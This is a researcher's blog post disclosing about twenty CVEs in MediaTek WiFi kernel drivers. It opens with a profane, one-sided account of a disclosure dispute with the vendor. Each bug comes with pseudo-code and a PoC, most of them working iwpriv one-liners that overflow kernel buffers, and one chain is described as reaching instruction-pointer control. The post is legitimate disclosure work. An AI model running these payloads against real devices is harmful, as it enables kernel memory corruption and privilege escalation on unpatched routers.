introduction

Hello again! It’s been a while since I’ve posted and it’s been a busy year as usual (including a Pwn2Own win with the boys @SummoningTeam!). This post is going to be a sort of year-in-review for the work I’ve done on Mediatek WiFi chipsets. The bugs discussed below affect the MediaTek MT76xx and MT7915 Wifi chipset family; most of them were found over the course of ~3 months early in the year but were only made public over the past couple of months. A few others were technically discovered last year but were only made public this year. While the 3-month thing might sound impressive, the journey leading up to those three months took 2 years to get through. It’s true what they say, though: once you become familiar enough with a target the bugs just fall right out! Overall, these bugs were a fun introduction to kernel exploitation and being limited to a testbed with basically 0 debugging capabilities was a fun challenge for exploit development.

Along with the bugs, I’m also including a little story I thought might be a kick for those familiar with dealing with vendors and disclosure. An interesting bit of lore: I’d originally planned on releasing the details of these issues via “uncoordinated” disclosure earlier this year, when I wrote the first draft of this post. Better heads ultimately prevailed and I avoided that bag of bees but I hope the story below will give you an idea of why I had considered it.

The reason I chose to include the story at all is because I don’t think companies should be able to hide their shitty behavior behind arbitrary policies they come up with. Coordinated disclosure is an act of good faith and vendors who act in bad faith deserve to be named-and-shamed. Especially when their behavior calls into question their integrity and credibility in assessing the impact of the vulnerabilities in their products. I think the story below will show you exactly what I mean.

I’ll be diving deeper into the discovery and exploitation of a couple of these bugs in future posts, so stick around! But for now, let’s just get on with it.

NOTE: all code snippets included in this post are pseudo-code representative of how the bugs manifest.

the story: a glimpse into the madness

I’ve intentionally left out a lot of context in the interest of brevity and for…reasons. Let’s just say there were incentives for Mediatek to invalidate or downgrade the severity of the bugs I had reported. I’ll just leave it at that. This is the most blatant example but definitely not the only time Mediatek behaved…questionably throughout the process.

At some point during the (nearly 6-month-long) disclosure process for these bugs, the issue was raised about the requirement of root privileges for executing iwpriv set commands for a particular report. I clarified that the privilege needed was CAP_NET_ADMIN, but otherwise didn’t argue that point and it was agreed that some privileges were required for a subset of reported issues which were triggered via the iwpriv set interface. They reduced the impact from High to Medium for one of those issues.

Then a couple of days later, they reduced the impact for almost all of the remaining issues from High to Medium without providing any reason for doing so. When I asked about this for the bugs which weren’t affected by the privilege requirement we’d discussed, they responded by asking me to describe the steps for how I added an unprivileged user and whether root privileges were required to add an unprivileged user for one of the reports they’d reduced the severity of (ignoring all the others I’d asked about). I could barely even understand what that question was supposed to mean given the context. Because I’d used an unprivileged user to execute the PoC in my report, they were asking me whether I would have needed privileges to add that user (implying they think that’s something an attacker would need to do??). So I clarified that I added the steps to add an unprivileged user in my reproduction steps for the benefit of their engineers and to prove that privileges were not required to exploit the bug, and that the attacker would be the unprivileged user in an exploit scenario.

And then they hit me with an absolute banger: they claimed that, actually, their “default design” doesn’t consider the existence of unprivileged users, and all users are considered to be privileged, therefore privileges are always required and the CVSS is reduced to medium.

For a Linux kernel driver…provided as part of an SDK to OEM vendors…for chipsets supported on embedded and desktop/consumer devices…

I’ll let you sit with that one for a second. It’s makes even less sense the longer you think about it.

Their exact words (nearly indecipherable within the context of the discussion) were:

In our default design, we do not consider multiple user cases. By default, the system only has a privileged user, making the malicious actor more difficult to conduct the attack. This is unlike Android OS apps which can be directly downloaded from Google Play store.

That’s right. A multi-billion dollar company responsible for producing chipsets that are used across millions of devices says this is how they conceptualize the security of their products. This would be completely disqualifying if they actually meant it.

By this definition of their “default design”, local privilege escalation is impossible for these drivers. Except, they’ve been issuing CVEs and advisories for these chipsets for years, where they explicitly mention the lack of privileges required and the impact as local privilege escalation. Like, literally, they’ve issued CVEs for bugs I reported this year, with this exact language.

You can’t make this shit up. Are y’all fucking hearing this??? Interestingly, if you take a look at their most recent advisories, they no longer include any information about the impact. They started doing this after I had pointed out the discrepancy between their supposed “default design” and their classification of past bugs. It gives me the impression that they want to be able to use this bullshit argument in the future with other researchers and they’re trying to cover their bases.

To drive the point home even further (which I don’t think is needed at this point): what would have been the point of raising the issue of the CAP_NET_ADMIN privilege requirement mentioned at the beginning of the story if no concept of privilege separation even exists in their “default design”?

The answer is that they were lying. They were trying to lie to me and they were trying to lie to their customers and partners. They should be embarrassed. Wouldn’t you be embarassed to say this kind of stuff in public? Franky, it’s insulting. Only someone who doesn’t know shit about how this stuff works would be fooled by these arguments. The alternative is that they actually believe what they’re saying, which doesn’t seem much better.

It begs the question, though: why were they willing to behave in such an obviously dishonest way? I have some thoughts but I’ll leave that up to your imagination, dear reader. I will say this: companies will be as bad as they’re allowed and incentivized to be.

Anyway, after I’d made the decision to not go with “uncoordinated” disclosure, I thought I’d remind the folks I was dealing with that I would be under no obligation to not discuss their behavior publicly (as I’m doing now) after the CVEs were made public, along with all the proof needed to show their assessments were faulty. And wouldn’t you know it…that post-nut clarity hit and they dropped (most of) their bullshit arguments.

It’s funny how that works, isn’t it?

In conclusion: fuck it, we ball. Let’s move onto the bugs. These might give you a good laugh, too!

the bugs

CVE-2025-70631: Heap Overflow in SETPSK Ioctl Handler

• Affected Versions: MT7622 v5.0.5.4, v5.1.0.0; MT7629 driver v6.0.3.0
• Affected Devices: Netgear WAX206 (confirmed), Starlink Wifi Gen2
• Requirements: WSC_AP_SUPPORT

The handler code responsible for handling the RT_OID_SET_PSK OID is found in the function RTMPAPSetInformation(). The root cause of the vulnerability is improper bounds checking of the attacker-controlled iwreq.u.data.length value passed from userspace. An initial check is done on this value to ensure it does not exceed the max of 65 bytes, but failing this check does not immediately trigger an error if the driver is built with WSC_AP_SUPPORT feature. In this case, a field pWscControl from the wireless interface’s device structure is checked; if its not NULL, the operation proceeds and ends up calling copy_from_user() with the attacker controlled length value into the pWscControl->WpaPsk field. This is where the overflow occurs.

	if (wrq->u.data.length < 65) {
		...
	} else {
		...
		if (pWscControl) {
			// VULNERABLE copy_from_user()
			res = copy_from_user(wsc_ctrl->psk, wrq->u.data.pointer, wrq->u.data.length);
			...
		}
	}

PoC

PoC Source: PoC Link

Execute the PoC on a vulnerable system to corrupt kernel memory.

root@WAX206:/tmp# ./poc-ioctl
[  312.422633] Unable to handle kernel paging request at virtual address 41414141414145
[  312.430424] pgd = ffffffc016fb6000
[  312.433854] [41414141414145] *pgd=0000000000000000[  312.434057] [PMF]APPMFInit:: Security is not WPA2/WPA2PSK AES
[  312.434060] [PMF]APPMFInit:: apidx=0, MFPC=0, MFPR=0, SHA256=0
[  312.434126] wifi_sys_linkdown(), wdev idx = 0
...

CVE-2025-70632: Heap Overflow in R0KHID Ioctl Handler

• Affected Versions: MT7622 v5.0.5.4, v5.1.0.0; MT7629 driver v6.0.3.0
• Affected Devices: Netgear WAX206 (confirmed), Starlink Wifi Gen2

The handler code responsible for handling the RT_OID_802_11R_R0KHID OID is found in the function RTMPAPSetInformation(). The root cause of the vulnerability is improper bounds checking of the attacker-controlled iwreq.u.data.length value passed from userspace; rather than checking that the value does not exceed the size of the destination FtR0khId field and exiting early if it does, the code does the opposite and checks that the incoming size if not less than or equal to the destination field size, essentially forcing an overflow condition to occur. The overflow happens on the call to copy_from_user() and writes to wdev.FtCfg.FtR0khId[48]. This is likely the result of a typo (using <= when >= was intended).

...
if (wrq->u.data.length <= FT_ROKH_ID_LEN)
	// error case
else {
	status = copy_from_user(obj->ap.bssid[apidx].wdev.cfg.r0khid, wrq->u.data.pointer, wrq->u.data.length);
	...
}

PoC

PoC Source: PoC Link

The included PoC demonstrates the ability to corrupt the instruction pointer with an arbitrary address by chaining this bug with an info leak in the iwpriv mac subcommand handler.

CVE-2025-20713: Stack Overflow in Set_BeaconReq_Proc Parsing of channel report list

• Affected Versions: MT7622 v5.0.5.4
• Affected Devices: Netgear WAX206 (confirmed)

The function Set_BeaconReq_Proc() in the mt7622_mt_wifi driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to ioctl() which triggers the handler. Specifically, the issue is found in the code block that handles parsing of the “channel report list” command parameter field in the incoming command string. The issue occurs due to an unbounded while loop which uses a counter to index and write into a stack allocated buffer based on presence of the separate character # in the argument field. The values written to this buffer are 1-byte numeric values parsed using strtol() from the attacker-controlled input.

case 8:
	...
	// @hypr: VULNERABLE
	while ((chan_id_str = strsep((char **)&input_str, "#")) != NULL) {
		chan_rep_list[chan_id] = strtol(chan_id_str, 0, 10);
		chan_id++;
	}
...

PoC

On a system where the kernel driver is installed, run the following iwpriv command to issue the IOCTL for the vulnerable code path via the set subcommand for BcnReq key value.

# write in 65 (0x41), so we end up with 0x414141414141
export PAYLOAD=$(python3 -c "print('#65'*400)")
iwpriv ra0 set "BcnReq=1!50!12!FF:FF:FF:FF:FF:FF!HYPR!255!1!32+1!1#5!1!1$PAYLOAD"

CVE-2025-20714: Stack Overflow in Set_BeaconReq_Proc Parsing of regulatory class parameter

MediaTek assigned a CVE for this bug, but still claimed the bug was a duplicate because the overflow happens in the same function as the other two issues in this function (CVE-2025-20715, CVE-2025-20713). That’s it – that’s the only reason they used to argue it was a duplicate.

• Affected Versions: MT7622 v5.0.5.4
• Affected Devices: Netgear WAX206 (confirmed)

The function Set_BeaconReq_Proc() in the mt7622_mt_wifi driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to ioctl() which triggers the handler. Specifically, the issue is found in the code block that handles parsing of the “regulatory class” command parameter field in the incoming command string (parameter index 7). The issue occurs due to an unbounded while loop which uses a counter to index and write into a buffer at RRM_MLME_BCN_REQ_INFO req_struct.reg_class[16] (stack allocated) based on presence of the separate character + in the argument field. The values written to this buffer are 1-byte numeric values parsed using os_str_tol() from the attacker-controlled input.

case 7: { /* regulatory class. */
	while ((reg_str = strsep((char **)&thisChar, "+")) != NULL) {
		req_struct.reg_class[reg_class_index] = strtol(reg_str, 0, 10);
		reg_class_index++;
	}
}

PoC

On a system where the kernel driver is installed, run the following commands to create the payload buffer and issue the IOCTL for the vulnerable code path via the iwpriv set subcommand for the BcnReq key value.

# write in 65 (0x41), so we end up with 0x414141414141
export PAYLOAD=$(python3 -c "print('+65'*400)")
iwpriv ra0 set "BcnReq=1!50!12!FF:FF:FF:FF:FF:FF!HYPR!255!1!32$PAYLOAD"

CVE-2025-20715: Stack Overflow in Set_BeaconReq_Proc Parsing of request IE parameter

• Affected Versions: MT7622 v5.0.5.4
• Affected Devices: Netgear WAX206 (confirmed), others not confirmed

The function Set_BeaconReq_Proc() in the mt7622_mt_wifi driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to ioctl() which triggers the handler. Specifically, the issue is found in the code block that handles parsing of the “request_ie” command parameter field in the incoming command string (parameter index 10). The issue occurs due to an unbounded while loop which uses a counter to index and write into a buffer at request_ie[13] based on presence of the separate character # in the argument field. The values written to this buffer are 1-byte numeric values parsed using strtol() from the attacker-controlled input.

case 10: {
	// @hypr: VULNERABLE
	while ((req_str = strsep((char **)&input_str, "#")) != NULL) {
		request_ie[request_ie_num] = strtol(req_str, 0, 10);
		request_ie_num++;
	}
}

PoC

On a system where the kernel driver is installed, run the following commands to create a payload buffer and run iwpriv to issue the IOCTL for the vulnerable code path via the set subcommand for BcnReq key value.

# write in 65 (0x41), so we end up with 0x414141414141
export PAYLOAD=$(python3 -c "print('#65'*400)")
iwpriv ra0 set "BcnReq=1!50!12!FF:FF:FF:FF:FF:FF!HYPR!255!1!32+1!1#5!1!1$PAYLOAD"

CVE-2025-20717: Stack Overflow in Set_Igmp_Flooding_CIDR_Proc

• Affected Versions: MT7622 v5.0.5.4
• Affected Devices: Netgear WAX206 (confirmed)
• Requirements: IGMP_SNOOP_SUPPORT flag

The vulnerability occurs due to a lack of bounds checking when performing a copy operation of user-controlled data into a statically-sized buffer. This happens in the function Set_Igmp_Flooding_CIDR_Proc() when the contents of arg (which contains the argument passed as the value of IgmpFloodingCIDR in the iwpriv command) is copied to the local buffer IPString[25] using NdisMoveMemory(). The copy operation uses the length of the string in arg as it’s size argument without checking to ensure the string length does not exceed the size of the ip_addr_str[] buffer. Any argument with a length greater than 25 will result in a stack buffer overflow.

    char ip_addr_str[25] = {'\0'};
    char *addr_str_ptr = NULL;
	...
    do {
		...
        addr_str_ptr = ip_addr_str;
		// @hypr: VULNERABLE
        NdisMoveMemory(addr_str_ptr, arg, strlen(arg));
        addr_str_ptr[strlen(arg)] = '\0';
		...

PoC

On a system where the kernel driver is installed, run the following commands to create a payload buffer and run iwpriv to issue the IOCTL for the vulnerable code path via the set subcommand for IgmpFloodingCIDR key value.

export PAYLOAD=$(python3 -c "print('A'*2000)")
iwpriv <interface> set IgmpFloodingCIDR=0-$PAYLOAD

CVE-2025-20718: Stack Overflow in RTMPAPIoctlE2PROM

• Affected Versions: MT7622 v5.0.5.4
• Affected Devices: Netgear WAX206 (confirmed)

The function RTMPAPIoctlE2PROM() in the mt7622_mt_wifi driver is vulnerable to a stack buffer overflow when handling the data passed in via the call to ioctl() which triggers the handler. Specifically, the issue is found in the code that handles parsing of the value that follows the = character in the command string value included in the request (indicating a write operation). The issue occurs when performing a write operation (NdisMoveMemory()) using the length of the incoming string value as the size argument without checking whether it exceeds the size of the destination buffer. In this case, the destination buffer dest[] is a char buffer of 16 bytes.

	value = strchr(this, '=');
	if (value != NULL)
		*value++ = 0;
	if (!value || !*value) {
	...
	} else {
		// @hypr: VULNERABLE (you've gotta be fucking kidding lmao)
		NdisMoveMemory(&dest, value, strlen(value));
		dest[strlen(value)] = '\0';
		...
	}

PoC

On a system where the kernel driver is installed, run the following iwpriv command to issue the IOCTL for the vulnerable code path via the e2p subcommand.

iwpriv <interface> e2p rrr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

CVE-2025-20731: Heap Overflow in OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT Handler

This bug has been incorrectively (and deceptively, imo) marked as Medium severity but it is provably not. The proof that I submitted (showing an unprivileged user exploiting the bug) was intentionally misunderstood as meaning that an attacker would have to create an unprivileged user first in order to exploit the bug, and creating users requires privileges, therefore privileges are required…?????? I corrected them multiple times but they were unable to comprehend that creating the unprivileged user wasn’t something the attacker would need to do. Go figure.

• Affected Versions: MT7622 driver v5.0.5.4, v5.1.0.0, MT7629 v6.0.3.0, MT7915 v7.4.0.0
• Affected Devices: Netgear WAX206 (confirmed)
• Requirements: OCE_SUPPORT flag

The vulnerability occurs in the function RTMPAPSetInformation() when handling the case for OID OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT (0x969) subcommand.

The issue is caused by the use of the attacker-controlled value nr_list_info->ValueLen in the call to NdisMoveMemory() without performing an upper bounds check to ensure the size of the write will not overflow the destination buffer. In this case, the destination is the pMBSS->nr_list_info.Value[512] buffer. nr_list_info->ValueLen is initialized with the data read from userspace via copy_from_user() and is a uint32, which means it’s possible to provide a length value of up to MAX_UINT32 bytes (0xffffffff). This will result in corruption of heap memory as the buffer is allocated within a larger structure allocated on the heap.

case OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT: {
	if (is_oce_rnr(wdev)) {
		...
		status = copy_from_user(&nr_list_info, wrq->u.data.pointer, wrq->u.data.length);
		station_obj = &obj->cfg.mbssid[ap_idx];
		// @hypr: VULNERABLE - overflow from nr_list_info.ValueLen, copied in from userspace
		NdisMoveMemory(station_obj->nr_list_info.Value,
				nr_list_info.Value, nr_list_info.ValueLen);
		station_obj->nr_list_info.ValueLen = nr_list_info.ValueLen;
		...
	}
}

Vulnerable systems must have the OceReducedNeighborReport driver configuration flag set to 1.

PoC

PoC Source: PoC Link

Execute the PoC on the target system running a vulnerable driver to trigger a kernel crash:

# trigger the vulnerability
./ioctl-ocernr-heap rai0 8000

CVE-2025-20732: Stack Overflow in OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT Handler

This bug has been incorrectively (and deceptively, imo) marked as Medium severity but it is provably not. The proof that I submitted (showing an unprivileged user exploiting the bug) was intentionally misunderstood as meaning that an attacker would have to create an unprivileged user first in order to exploit the bug, and creating users requires privileges, therefore privileges are required…?????? I explained myself multiple times but they were “unable” to comprehend that creating the unprivileged user wasn’t something attacker would need to do.

• Affected Versions: MT7622 driver v5.0.5.4, v5.1.0.0, MT7629 v6.0.3.0, MT7915 v7.4.0.0
• Affected Devices: Netgear WAX206 (confirmed)
• Requirements: OCE_SUPPORT flag

The vulnerability occurs in the function RTMPAPSetInformation() when handling the case for OID OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT (0x969) subcommand. The issue is caused by the use of the attacker-controlled value wrq->u.data.length in the call to copy_from_user() without performing an upper bounds check to ensure the size of the data will not overflow the destination buffer. In this case, the destination is the nr_list_info structure which has a size of (512 + 4 + 4) = 520 bytes. Therefore, size values greater than 520 bytes will result in kernel stack corruption.

    case OID_802_11_OCE_REDUCED_NEIGHBOR_REPORT: {
        if (is_oce_rnr(dev)) {
			...
			// @hypr: VULNERABLE - overflow nr_list_info structure
            status = copy_from_user(&nr_list_info, wrq->u.data.pointer, wrq->u.data.length);
            station_obj = &obj->cfg.mbssid[ap_idx];
			...
        }
    }

Vulnerable systems must have the OceReducedNeighborReport driver configuration flag set to 1.

PoC

PoC Source: PoC Link

Execute the PoC on the target system running a vulnerable driver to trigger a kernel crash:

# trigger the vulnerability
./ioctl-ocernr-overflow rai0 2000

CVE-2025-20733: Heap Overflow in RT_OID_WSC_SET_CON_WPS_STOP Handler

• Affected Versions: MT7622 v5.1.0.0, MT7629 v6.0.3.0, MT7981 driver v7.6.7.2
• Affected Devices: Netgear WAX206 (confirmed), SpaceX Starlink Wifi Gen2

The vulnerability occurs in the function RTMPAPSetInformation() when handling the OID for RT_OID_WSC_SET_CON_WPS_STOP (0x764). Within the body of the switch-case that handles this OID, an allocation is made of sizeof(WSC_UPNP_CTRL_WSC_BAND_STOP) and saved to the pointer upnp_data_struct. Assuming the allocation succeeds, a block is entered where copy_from_user() is called to copy data from userspace and write it to the memory allocated to upnp_data_struct, using wrq->u.data.length as the size argument for the copy operation.

No upper bounds check is performed on the value in wrq->u.data.length, which is attacker-controlled, prior to it’s use in the call to copy_from_user(), leading to a heap buffer overflow if an attacker provides a length value that is greater than sizeof(WSC_UPNP_CTRL_WSC_BAND_STOP) (which evaluates to 12 bytes).

case RT_OID_WSC_SET_CON_WPS_STOP: {
	alloc_mem(NULL, &upnp_data_struct, sizeof(WSC_UPNP_CTRL_WSC_BAND_STOP));
	if (upnp_data_struct) {
		// @hypr: VULNERABLE
		ret = copy_from_user(upnp_data_struct, wrq->u.data.pointer, wrq->u.data.length);
		}
	}
}

PoC

PoC Source: PoC Link

Execute the PoC with a large bufsize argument:

./poc ra0 2048

CVE-2025-20734: Heap Overflow in Set_SecWPAPSK_Proc

• Affected Versions: MT7622 v5.1.0.0, MT7629 v6.0.3.0, MT7981 driver v7.6.7.2
• Affected Devices: Netgear WAX206 (confirmed), SpaceX Starlink Wifi Gen2
• Requirements: CONFIG_AP_SUPPORT and WSC_AP_SUPPORT must be enabled in the build configuration.

The vulnerability occurs in the function Set_WPAPSK_Proc() when processing an attacker-controlled argument string. The function first checks if the length of the argument string is less than 65. If so, it enters a block where the key data is set. However, if the length exceeds 65, the function does not treat this as an error and continues execution.

If the WSC_STA_SUPPORT build flag was enabled, the vulnerable code block is included in the function and is reached after the check above. Within this block:

1. The length of the attacker-controlled argument string is calculated using strlen()
2. The length value is used as the length argument in a call to NdisMoveMemory() to write to dev->ctrl.WpaPsk

No bounds checking is performed on the length of the argument string before this copy operation. Since ctrl->WpaPsk is statically sized at 64 bytes, any argument string longer than 64 bytes will overflow the buffer. Additionally, because NdisMoveMemory() is used for the copy operation, there are no restrictions on the payload data, allowing the attacker to include null bytes or other arbitrary data in the overflow.

int Set_WPAPSK_Proc(adapter_obj *obj, char *arg)
{
...
#ifdef WSC_STA_SUPPORT
    // @hypr: VULNERABLE
    NdisMoveMemory(dev->ctrl.WpaPsk, arg, strlen(arg));
#endif
}

PoC

Execute the commands below on a system running the vulnerable driver to trigger the bug.

iwpriv ra0 set WPAPSK=$(python3 -c "print('A'*8000)")

# force use of corrupted pointers
iwpriv ra0 set WscConfStatus=2

CVE-2025-20735: Heap Overflow in mtk_send_offchannel_action_frame

• Affected Versions: MT7622 v5.1.0.0
• Requirements: Driver must be built with DPP_SUPPORT configuration option (this should also enable the CHANNEL_SWITCH_MONITOR_CONFIG flag)

The vulnerability occurs in the function mtk_send_offchannel_action_frame(). The function allocates a fixed-size heap buffer OutBuffer of 2304 bytes using the MlmeAlloc() macro. However, the function subsequently calls MakeOutgoingFrame() to copy attacker-controlled data into this buffer without validating the size of the data.The size of the data to be copied is determined by the frm->frm_len field, which is passed from userspace via the IOCTL handler. If an attacker specifies a value larger than 2304 bytes, the memmove() operation in MakeOutgoingFrame() will write beyond the bounds of the allocated buffer, resulting in a heap buffer overflow.

{
    ...
    // Allocate a fixed-size buffer of 2304 bytes
    status = MlmeAlloc(pAd, &pOutBuffer);
	...
    // Vulnerable: No bounds checking on frm->frm_len
    MakeOutgoingFrame(OutBuffer, &FrameLen,
                      sizeof(HEADER_802_11), &Hdr,
                      frm->frm_len, frm->frm,
                      0);
}

PoC

PoC Source: PoC Link

Compile and execute the PoC like this:

./poc ra0 5000

CVE-2025-20736: Stack Overflows in Set_IgmpSn_AddEntry_Proc and Set_IgmpSn_DelEntry_Proc

This was another fun one. This pair of Add/Delete functions both contain basically the same bug which results in a buffer overflow. MediaTek argued that one of these was a duplicate by their definition because, and I kid you not, the two bugs occur in the same file.

• Affected Versions: MT7622 v5.1.0.0
• Requirement: VENDOR_FEATURE6_SUPPORT enabled

Set_IgmpSn_DelEntry_Proc

The vulnerability occurs in the function Set_IgmpSn_DelEntry_Proc() when handling parsing of an IP address value from the argument string passed in from userspace. In this block, a for loop is used together with calls to rstrtok() using the . character as a separator to parse the individual octets of the IP address string. Within this loop, there is no bounds checking done on the i iterator variable to ensure it does not exceed the size of the ip_addr[4] buffer prior to using the i variable to index into the ip_addr[] buffer when writing the parsed numeric value from the argument token using strtol(). This results in an OOB write condition that can be used to corrupt the kernel stack if a string with more than 4 “.” characters is found.

    while ((c = strsep((char **)&input, "-")) != NULL) {
        } else {
            for (i = 0, value = rstrtok(c, "."); value; value = rstrtok(NULL, ".")) {
				...
                // unbounded for loop with rstrtok will keep reading as long as '.' are found
                ip_addr[i] = (char)strtol(value, NULL, 10);
                i++;
            }
		...
        }

The vulnerability can be triggered using the following payload, which sends an overlong sequence formatted reach the bug.

# trigger the bug by sending overlong '65.' sequence
iwpriv ra0 set IgmpDel=$(python3 -c 'print("65."*200)')

Set_IgmpSn_AddEntry_Proc

The vulnerability occurs in the function Set_IgmpSn_AddEntry_Proc() when handling parsing of an IP address value from the argument string passed in from userspace. The vulnerable logic for this function is identical to that shown in Set_IgmpSn_DelEntry_Proc() above.

The vulnerability can be triggered using the following payload, which sends an overlong sequence formatted reach the bug.

# trigger the bug in the Add handler
iwpriv ra0 set IgmpAdd=$(python3 -c "print('65.'*400)"

CVE-2025-20737: Stack Overflow + Info Leak in OID_802_11_PASSPHRASES Handler

• Affected Versions: MT7622 v5.1.0.0

The vulnerability occurs in the handler for OID_802_11_PASSPHRASES (0x0536). The code creates a fixed-size stack structure NDIS80211PSK psk and then uses copy_from_user() to copy data from user space into this structure without validating that the incoming data size matches the structure size. The size of the structure is 68 bytes, meaning any length value greater than 68 will result in kernel stack corruption. Additionally, the code goes on to use whatever value is in the struct member WPAKeyLen to print that many bytes from the contents of the WPAKey[] buffer without any bounds checking, resulting in disclosure of kernel memory to userspace in the kernel message buffer (dmesg).

case OID_802_11_PASSPHRASES: {
	...
    // stack allocated struct
    NDIS80211PSK psk;
	...
    // VULNERABLE - copies user-provided data of arbitrary length into fixed stack buffer
    ret = copy_from_user(&psk, wrq->u.data.pointer, wrq->u.data.length);
	...
    // VULNERABLE - uses user-provided length value to dump the contents of the WPAKey buffer, resulting in information leak if a size
    // larger than the WPAKey buffer is provided.
    for (i = 0 ; i < psk.WPAKeyLen ; i++)
        debug_log(("%c", psk.WPAKey[i]));
}

PoC

PoC Link

Execute the PoC below with the following parameters:

./poc ra0 0x8536 1600

CVE-2025-20738: Stack Overflow in Set_ApScan_Proc

• Affected versions: MT7622 v5.1.0.0, MT7629 v6.0.3.0

The Set_ApScan_Proc() function contains a while loop that reads characters from the input argument string and writes them to a fixed-size stack buffer dest[33]. The loop continues until it encounters a NULL byte in the input string. The issue is that there’s no check to ensure that the index i used to access the dest array remains within bounds (0-32). If the input string is longer than 33 bytes and doesn’t contain a colon (:) or NULL byte within the first 33 characters, the loop will write beyond the bounds of the dest[] array, causing a stack buffer overflow.

{
	...
    char dest[33];
    while (arg[j] != '\0') {
        // VULNERABLE - unbounded write to temp[i]
        dest[i] = arg[j];
        j++;
        if (dest[i] == ':' || arg[j] == '\0') {
	        // break
        }
        i++;
    }

PoC

Execute the command below on a system running the vulnerable driver to trigger the bug.

iwpriv ra0 set ApScanChannel=$(python3 -c "print('A'*1000)")

CVE-2025-20739: Stack Overflow in Set_IgmpSn_BlackList_Proc

• Affected Versions: MT7622 v5.1.0.0
• Requirements:
  • Configuration: IGMP Snooping enabled, IGMP TV mode enabled
  • Required features/build flags: IGMP_TVM_SUPPORT, IGMP_SNOOP_SUPPORT, CONFIG_VENDOR_FEATURE10_SUPPORT

The vulnerability occurs in the function Set_IgmpSn_BlackList_Proc() when copying the argument string in arg to the fixed-size char buffer IPString[100] using NdisMoveMemory(). The size argument given for the copy operation is calculated by measuring the length of the string in arg (the source buffer) without any upper-bounds check to ensure the length of the argument string does not exceed the size of the destination buffer. An argument string which contains more than 100 characters will result in a buffer overflow of the IPString[] buffer.

    char ip_str[100] = {'\0'};
    char *p_ip_str = NULL;
	...
    do {
		...
        p_ip_str = ip_str;
		// @hypr: VULNERABLE
        NdisMoveMemory(p_ip_str, arg, strlen(arg));

PoC

Execute the command below on a system running the vulnerable driver to trigger the bug.

iwpriv ra0 set IgmpSnExemptIP=$(python3 -c "print('A'*200)")

CVE-2025-20741: Heap Overflow in vie_oper_proc

• Affected Versions: MT7622 v5.1.0.0
• Affected Devices: Netgear WAX206 (confirmed)

The function vie_oper_proc() in the mt7622_mt_wifi driver is vulnerable to a heap buffer overflow when handling the incoming command string passed in via the ioctl() handler and iwpriv interface. The overflow happens due to a lack of length restrictions on the parsing of a string token using sscanf() on the incoming string. This value is parsed and written to a heap allocated buffer, which can result in a heap buffer overflow if the length of the token exceeds the size of the allocated buffer. In this case, the size of the allocated buffer is calculated with the expression sizeof((MAX_VENDOR_IE_LEN + 1) * 2), which incorrectly calculates the size of the result of the arithmetic expression rather than using the result of the expression (as appears to be the intent). In effect, the allocation will always be for sizeof(unsigned int) bytes (4).

    if (arg) {
		// @hypr: VULNERABLE on last `%s` field into `ctnt`
        input_argument = sscanf(arg,
                    "%d-frm_map:%x-oui:%6s-length:%d-ctnt:%s",
                    &op, &frm_map, oui, &length, ctnt);
		...
        }

PoC

On a system where the kernel driver is installed, run the following iwpriv command to issue the IOCTL for the vulnerable code path via the set command for the vie_op key.

iwpriv ra0 set vie_op=1-frm_map:1-oui:00bbaa-length:1194-ctnt:$(python3 -c "print('A'*600)")

CVE-2025-20748: Kernel Code Execution via OOB Write in SetRxvRecordEn

• Affected Versions: MT7622 v5.1.0.0
• Affected Devices: Netgear WAX206 (confirmed)

The vulnerability occurs in the function SetRxvRecordEn(), which is the handler for the iwpriv set RxvRecordEn subcommand. Within this function, an attacker-controlled argument string is parsed using the insecure string function sscanf() without a length limit or upper bounds check on the length of the argument string. This results in a buffer overflow of the obj->RxvFilePath[256] buffer, contained within the device object for the underlying network interface. As there is no upper bounds on the write size, it’s possible to corrupt almost the entirety of the struct wdev object and beyond.

		// @hypr: VULNERABLE
        rv = sscanf(arg, "%d-%d-%d-%d-%d-%d-%d-%d-%s",
            &Enable, &Mode, &wcid, &band_idx, &g0, &g1, &g2, &error_en, &obj->RxvFilePath[0]);

PoC: Corrupt Kernel Memory

To trigger the vulnerability and corrupt memory:

iwpriv ra0 set RxvRecordEn=1-1-0-1-5-1-5-5-$(python -c "print('A'*400)")

After running the command, perform an operation that will result in the sending of a notification to enrolled notify handlers. An easy way to do this is to trigger a ‘link down’ operation on the interface via ifconfig ra0 down. Another option is to use the iwpriv ra0 set SSID=<anything>, which re-inits the interface and will trigger a notify call. A crash should occur in the function mt_notify_call_chain() upon access to a corrupted portion of the WifiSysInfo struct in the device struct for the interface.

PoC: Kernel IP Control

PoC Source: PoC Link

The PoC leverages the vulnerabilty to corrupt the adjacent WifiSysInfo object to hijack execution flow in the kernel. This object contains linked lists pointing to struct notify_entry objects, which each contain a function pointer at notify_entry.notify_caller, so corrupting the pointers in the linked list can be used to point to a fake struct notify_entry object and use that to hijack execution flow when the embedded callback function is executed. The PoC makes use of a kernel info leak available through the iwpriv mac subcommand handler to determine the address of memory containing controlled data in the kernel and writes a forged object to align with the notify_entry structure.

Executing the PoC will result in execution being redirected to the address 0x1337babe1337babe (tested on the MediaTek MT7622 AX3600-gmac1-WAX206 board, Linux 4.x). The output below shows successful control of the instruction pointer.

[ 2750.312397] [PMF]APPMFInit:: apidx=0, MFPC=1, MFPR=0, SHA256=0
[ 2750.318306] [PMF]PMF_MakeRsnIeGMgmtCipher: Insert BIP to the group management cipher of RSNIE
[ 2750.326896] wifi_sys_linkdown(), wdev idx = 0
[ 2750.331284] Internal error: Oops - SP/PC alignment exception: 8a000000 [#1] PREEMPT SMP
[ 2750.339278] Modules linked in: <snip>
[ 2750.463620] CPU: 0 PID: 13791 Comm: iwpriv Tainted: P                4.4.198 #0
[ 2750.470919] Hardware name: MediaTek MT7622 AX3600-gmac1-WAX206 board (DT)
[ 2750.477698] task: ffffffc01e641600 task.stack: ffffffc01e730000
[ 2750.483610] PC is at 0x37babe1337babe
[ 2750.487424] LR is at mt_notify_call_chain+0x3c/0x58 [mt7622_mt_wifi]
[ 2750.493770] pc : [<0037babe1337babe>] lr : [<ffffff80010b213c>] pstate: 80000145
[ 2750.501154] sp : ffffffc01e733850
